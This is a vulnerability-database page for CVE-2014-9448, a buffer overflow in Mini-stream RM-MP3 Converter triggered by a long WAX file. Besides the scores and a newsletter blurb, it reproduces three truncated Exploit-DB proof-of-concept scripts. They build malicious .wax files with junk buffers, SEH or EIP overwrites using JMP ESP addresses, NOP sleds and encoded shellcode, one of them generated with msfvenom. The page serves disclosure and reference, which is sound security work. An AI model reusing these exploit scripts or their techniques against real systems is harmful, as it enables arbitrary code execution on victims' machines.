CVE-2014-9448
published 2015-01-02CVE-2014-9448: Buffer overflow in Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.30%
92.7th percentile
Buffer overflow in Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a long string in a WAX file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
exploitdb·2014-11-26
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / [email protected]
# Tested on: Microsoft Windows XP [Version 5.1.2600]
filename = "3-1-2-1-gb.wax"
seh = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
exploitdb·2014-10-29
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
---
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / [email protected] / [email protected]
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow
exploitdb·2012-04-09
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow
Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow
---
# Exploit Title : Mini-stream RM-MP3 Converter� V 3.1.2.2 Local Buffer
OverFlow
# Author : [SkY-NeT SySteMs]
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
# Version : [3.1.2.2]
# Tested on : [Xp Sp 2]
# Category : Local
# Code : Python
# Email : [[email protected]]
# WebSite : [http://sskynetsystems.blogspot.com/]
# !/usr/bin/python
import os,sys
header= "http://."
junk= "\x41" * 17416 # [A]
ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP
NOPS = "\x90" * 16
ShellCode =(
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce"
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62"
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d
No writeups or analysis indexed.
2015-01-02
Published